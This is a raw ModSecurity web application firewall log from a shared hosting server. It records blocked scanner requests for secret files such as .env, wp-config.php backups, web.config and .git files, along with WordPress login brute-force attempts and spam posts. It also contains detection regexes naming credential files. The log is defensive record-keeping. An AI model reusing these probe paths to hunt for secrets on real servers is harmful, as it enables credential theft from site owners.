[Tue May 26 18:46:45.314051 2026] [security2:error] [pid 1025417:tid 1025600] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdPFHbArxonFeMXvQfHQAAADU"]
[Tue May 26 18:46:46.019080 2026] [security2:error] [pid 1025417:tid 1025606] [client 178.20.43.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdPVHbArxonFeMXvQfSgAAADs"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1221328&moderation-hash=60db0a56c75d1a789598e9219cc7ef26
[Tue May 26 18:46:46.572895 2026] [security2:error] [pid 1025417:tid 1025669] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdPlHbArxonFeMXvQfWwAAAHo"]
[Tue May 26 18:46:46.971605 2026] [security2:error] [pid 1025417:tid 1025419] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.backup"] [unique_id "ahWdPlHbArxonFeMXvQfewAAIAE"]
[Tue May 26 18:46:47.128471 2026] [security2:error] [pid 1025417:tid 1025420] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/crm/.env"] [unique_id "ahWdP1HbArxonFeMXvQfgwAAWAI"]
[Tue May 26 18:46:47.232365 2026] [security2:error] [pid 1025417:tid 1025667] [client 178.20.43.173:60341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 173.43.20.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWdP1HbArxonFeMXvQffAAAAHg"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 18:46:47.380993 2026] [security2:error] [pid 1025417:tid 1025527] [remote 50.62.182.250:38488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 250.182.62.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWdP1HbArxonFeMXvQfggAAFm0"]
[Tue May 26 18:46:47.395227 2026] [security2:error] [pid 1025417:tid 1025537] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.old"] [unique_id "ahWdP1HbArxonFeMXvQfigAAQXc"]
[Tue May 26 18:46:47.880672 2026] [security2:error] [pid 1025417:tid 1025534] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.env.bak"] [unique_id "ahWdP1HbArxonFeMXvQfmwAALHQ"]
[Tue May 26 18:46:48.032782 2026] [security2:error] [pid 1025417:tid 1025622] [client 178.20.43.173:62342] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "178.20.43.173" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWdQFHbArxonFeMXvQfnwAAAEs"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 18:46:48.379763 2026] [security2:error] [pid 1025417:tid 1025533] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/config/.env"] [unique_id "ahWdQFHbArxonFeMXvQfrQAAJ3M"]
[Tue May 26 18:46:48.890398 2026] [security2:error] [pid 1025417:tid 1025532] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/app/.env"] [unique_id "ahWdQFHbArxonFeMXvQfwgAASHI"]
[Tue May 26 18:46:48.922035 2026] [security2:error] [pid 1025417:tid 1025539] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/local/.env"] [unique_id "ahWdQFHbArxonFeMXvQfxgAAa3k"]
[Tue May 26 18:46:49.380026 2026] [security2:error] [pid 1025417:tid 1025542] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/src/.env"] [unique_id "ahWdQVHbArxonFeMXvQf1gAAV3w"]
[Tue May 26 18:46:49.881578 2026] [security2:error] [pid 1025417:tid 1025425] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backend/.env"] [unique_id "ahWdQVHbArxonFeMXvQf5gAAGQc"]
[Tue May 26 18:46:49.883566 2026] [security2:error] [pid 1025417:tid 1025585] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdQVHbArxonFeMXvQf2QAAACY"]
[Tue May 26 18:46:50.327259 2026] [security2:error] [pid 1025417:tid 1025544] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/api/.env"] [unique_id "ahWdQlHbArxonFeMXvQf8wAAP34"]
[Tue May 26 18:46:50.787783 2026] [security2:error] [pid 1025417:tid 1025434] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config.php"] [unique_id "ahWdQlHbArxonFeMXvQgAAAARhA"]
[Tue May 26 18:46:50.816871 2026] [security2:error] [pid 1025417:tid 1025545] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/prod/.env"] [unique_id "ahWdQlHbArxonFeMXvQgAQAAPH8"]
[Tue May 26 18:46:51.088193 2026] [security2:error] [pid 1025417:tid 1025575] [client 202.28.194.139:60422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.194.28.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWdQlHbArxonFeMXvQgAgAAABw"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 18:46:51.151711 2026] [security2:error] [pid 1025417:tid 1025428] [remote 84.247.129.9:44640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWdQlHbArxonFeMXvQgBQAAZwo"]
[Tue May 26 18:46:51.166829 2026] [security2:error] [pid 1025417:tid 1025430] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/settings.php"] [unique_id "ahWdQ1HbArxonFeMXvQgCAAAVww"]
[Tue May 26 18:46:51.551963 2026] [security2:error] [pid 1025417:tid 1025437] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php"] [unique_id "ahWdQ1HbArxonFeMXvQgFQAACRM"]
[Tue May 26 18:46:51.719260 2026] [security2:error] [pid 1025417:tid 1025435] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdQ1HbArxonFeMXvQgGwAAVhE"]
[Tue May 26 18:46:51.719422 2026] [security2:error] [pid 1025417:tid 1025633] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdQ1HbArxonFeMXvQgGwAAVhE"]
[Tue May 26 18:46:52.157003 2026] [security2:error] [pid 1025417:tid 1025608] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdQ1HbArxonFeMXvQgIAAAAD0"]
[Tue May 26 18:46:52.161460 2026] [security2:error] [pid 1025417:tid 1025433] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config.php.bak"] [unique_id "ahWdRFHbArxonFeMXvQgLAAAGA8"]
[Tue May 26 18:46:52.517407 2026] [security2:error] [pid 1025417:tid 1025445] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.backup"] [unique_id "ahWdRFHbArxonFeMXvQgOAAACBs"]
[Tue May 26 18:46:52.721128 2026] [security2:error] [pid 1025417:tid 1025442] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/vendor/laravel/.env"] [unique_id "ahWdRFHbArxonFeMXvQgOQAADBg"]
[Tue May 26 18:46:52.820671 2026] [security2:error] [pid 1025417:tid 1025444] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.bak"] [unique_id "ahWdRFHbArxonFeMXvQgQAAARho"]
[Tue May 26 18:46:53.330823 2026] [security2:error] [pid 1025417:tid 1025446] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.old"] [unique_id "ahWdRVHbArxonFeMXvQgUwAAfRw"]
[Tue May 26 18:46:53.763980 2026] [security2:error] [pid 1025417:tid 1025605] [client 202.28.194.139:35759] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "202.28.194.139" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWdRVHbArxonFeMXvQgXQAAADo"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 18:46:53.873371 2026] [security2:error] [pid 1025417:tid 1025450] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.save"] [unique_id "ahWdRVHbArxonFeMXvQgZAAAZiA"]
[Tue May 26 18:46:54.499891 2026] [security2:error] [pid 1025417:tid 1025457] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.swp"] [unique_id "ahWdRlHbArxonFeMXvQgdQAAQCc"]
[Tue May 26 18:46:54.579406 2026] [security2:error] [pid 1025417:tid 1025459] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/vendor/.env"] [unique_id "ahWdRlHbArxonFeMXvQgdgAADCk"]
[Tue May 26 18:46:54.713881 2026] [security2:error] [pid 1025417:tid 1025604] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdRlHbArxonFeMXvQgbgAAADk"]
[Tue May 26 18:46:55.039310 2026] [security2:error] [pid 1025417:tid 1025447] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.txt"] [unique_id "ahWdR1HbArxonFeMXvQggAAAbB0"]
[Tue May 26 18:46:56.528603 2026] [security2:error] [pid 1025417:tid 1025470] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/app/config/.env"] [unique_id "ahWdSFHbArxonFeMXvQgrwAAYjQ"]
[Tue May 26 18:46:56.689871 2026] [security2:error] [pid 1025417:tid 1025637] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdSFHbArxonFeMXvQgpAAAAFo"]
[Tue May 26 18:46:57.182051 2026] [security2:error] [pid 1025417:tid 1025495] [remote 176.95.46.127:50598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.46.95.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWdSFHbArxonFeMXvQgvAAADE0"]
[Tue May 26 18:46:57.468646 2026] [security2:error] [pid 1025417:tid 1025469] [remote 176.95.46.127:50598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.46.95.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWdSVHbArxonFeMXvQgxAAASDM"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 18:46:58.355601 2026] [security2:error] [pid 1025417:tid 1025475] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/core/app/.env"] [unique_id "ahWdSlHbArxonFeMXvQg3AAAQjk"]
[Tue May 26 18:46:59.965222 2026] [security2:error] [pid 1025417:tid 1025575] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdS1HbArxonFeMXvQg_AAAABw"]
[Tue May 26 18:47:00.208373 2026] [security2:error] [pid 1025417:tid 1025489] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.git/info/exclude"] [unique_id "ahWdTFHbArxonFeMXvQhDAAACUc"]
[Tue May 26 18:47:00.843969 2026] [security2:error] [pid 1025417:tid 1025647] [client 85.208.96.195:27694] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWdTFHbArxonFeMXvQhIQAAAGQ"]
[Tue May 26 18:47:00.844075 2026] [security2:error] [pid 1025417:tid 1025647] [client 85.208.96.195:27694] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWdTFHbArxonFeMXvQhIQAAAGQ"]
[Tue May 26 18:47:01.511072 2026] [security2:error] [pid 1025417:tid 1025492] [remote 45.148.10.5:61680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/web.config"] [unique_id "ahWdTVHbArxonFeMXvQhOAAARko"]
[Tue May 26 18:47:01.917107 2026] [security2:error] [pid 1025417:tid 1025629] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdTVHbArxonFeMXvQhNwAAAFI"]
[Tue May 26 18:47:02.114800 2026] [security2:error] [pid 1025417:tid 1025504] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/bitbucket-pipelines.yml"] [unique_id "ahWdTlHbArxonFeMXvQhSAAABFY"]
[Tue May 26 18:47:02.405547 2026] [security2:error] [pid 1025417:tid 1025501] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdTlHbArxonFeMXvQhVgAAGlM"]
[Tue May 26 18:47:02.405716 2026] [security2:error] [pid 1025417:tid 1025573] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdTlHbArxonFeMXvQhVgAAGlM"]
[Tue May 26 18:47:03.972346 2026] [security2:error] [pid 1025417:tid 1025514] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/.gitlab-ci.yml"] [unique_id "ahWdT1HbArxonFeMXvQhhgAAYmA"]
[Tue May 26 18:47:04.179770 2026] [security2:error] [pid 1025417:tid 1025517] [remote 5.42.158.148:58296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdT1HbArxonFeMXvQhhwAAQWM"]
[Tue May 26 18:47:05.181590 2026] [security2:error] [pid 1025417:tid 1025595] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdUFHbArxonFeMXvQhnAAAADA"]
[Tue May 26 18:47:05.748587 2026] [security2:error] [pid 1025417:tid 1025538] [remote 5.42.158.148:58296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdUVHbArxonFeMXvQhtQAAP3g"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:47:05.868460 2026] [security2:error] [pid 1025417:tid 1025529] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/environments/development.rb"] [unique_id "ahWdUVHbArxonFeMXvQhtwAAU28"]
[Tue May 26 18:47:06.213798 2026] [security2:error] [pid 1025417:tid 1025613] [client 195.2.84.198:59528] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "195.2.84.198" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWdUlHbArxonFeMXvQhyAAAAEI"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
